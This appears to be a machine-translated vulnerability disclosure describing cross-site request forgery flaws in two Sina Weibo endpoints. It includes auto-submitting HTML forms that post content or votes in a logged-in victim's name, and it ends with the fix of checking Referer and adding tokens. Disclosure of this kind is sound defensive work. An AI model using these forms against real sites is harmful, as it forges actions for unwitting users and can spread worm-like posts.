A csrf vulnerability in Sina Weibo may cause worms to spread. Weibo is released without the user's consent.
Detailed Description: When receiving POST and GET information, the Referer of POST is not verified, and the token is not added to the POST information to verify the correctness of the information, cause the vulnerability.
Vulnerability proof: vulnerability address:
Http://all.vic.sina.com.cn/tsingtaoeuro/api/send.php
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://all.vic.sina.com.cn/tsingtaoeuro/api/send.php" method = "post">
<Input type = "text" name = "content" value = "XX"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Interface return information
Effect
A csrf vulnerability in Sina Weibo may cause worms to spread. Weibo is released without the user's consent.
Detailed Description: When receiving POST and GET information, the Referer of POST is not verified, and the token is not added to the POST information to verify the correctness of the information, cause the vulnerability.
Vulnerability proof: vulnerability address:
Http://vote.weibo.com/wbclient/ref
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://vote.weibo.com/wbclient/ref" method = "post">
<Input type = "text" name = "poll_id" value = "1742981"/>
<Input type = "text" name = "content" value = "XXXXXXXXXXX"/>
<Input type = "text" name = "is_first" value = "0"/>
<Input type = "text" name = "_ t" value = "0"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Interface return information
Effect
Solution: Check the Referer of POST.
Add token in POST information
Author: imlonghao